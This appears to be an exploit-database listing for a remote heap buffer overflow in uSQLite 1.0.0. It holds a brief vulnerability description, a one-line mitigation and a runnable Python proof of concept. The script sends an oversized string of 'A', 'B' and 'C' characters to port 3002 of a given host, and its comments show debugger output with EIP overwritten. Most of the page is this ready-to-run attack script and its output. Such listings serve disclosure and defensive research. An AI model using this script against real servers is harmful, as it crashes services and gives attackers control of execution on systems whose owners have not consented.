header-logo
Suggest Exploit
vendor:
uSQLite
by:
Peter Baris
7,5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: uSQLite
Affected Version From: 1.0.0
Affected Version To: 1.0.0
Patch Exists: NO
Related CWE: N/A
CPE: a:usqlite:usqlite:1.0.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 and XP SP3
2016

Remote buffer overflow vulnerability in uSQLite 1.0.0 PoC

A buffer overflow vulnerability exists in uSQLite 1.0.0 when a long string is sent to the server. Sending a 259 A characters followed by 4 B characters and 360 C characters causes a heap based overflow. The EIP is then under control, but depending on the OS version, there might be issues finding a jump spot without DEP and ASLR.

Mitigation:

Ensure that the application is not vulnerable to buffer overflow attacks by validating user input and using secure coding practices.
Source

Exploit-DB raw data:

#!/usr/bin/python
# Exploit Title: Remote buffer overflow vulnerability in uSQLite 1.0.0 PoC
# Date: 27/10/1016
# Exploit Author: Peter Baris
# Software Link: https://sourceforge.net/projects/usqlite/?source=directory
# Version: 1.0.0
# Tested on: windows 7 and XP SP3

# Longer strings will cause heap based overflow

# usage:  python usqlite.py <host address>

# Output in the debugger

# EAX 0000038C
# ECX 00B0DA10
# EDX 0000038C
# EBX 41414141
# ESP 0028F8D0 ASCII "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
# EBP 41414141
# ESI 41414141
# EDI 41414141

# EIP 42424242  <-- EIP is under control, but depending on the OS version, you might have issues finding a jump spot without DEP and ASLR.

###############################################################################################################################################

import socket
import sys


if len(sys.argv)<=1:
	print("Usage: python usqlite.py hostname")
	sys.exit()


hostname=sys.argv[1]
port = 3002
buffer = "A"*259+"B"*4+"C"*360

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((hostname,port))
sock.send(buffer +'\r\n')
sock.recv(1024)
sock.close()

Navigation

Suggest Exploit

Services By CQR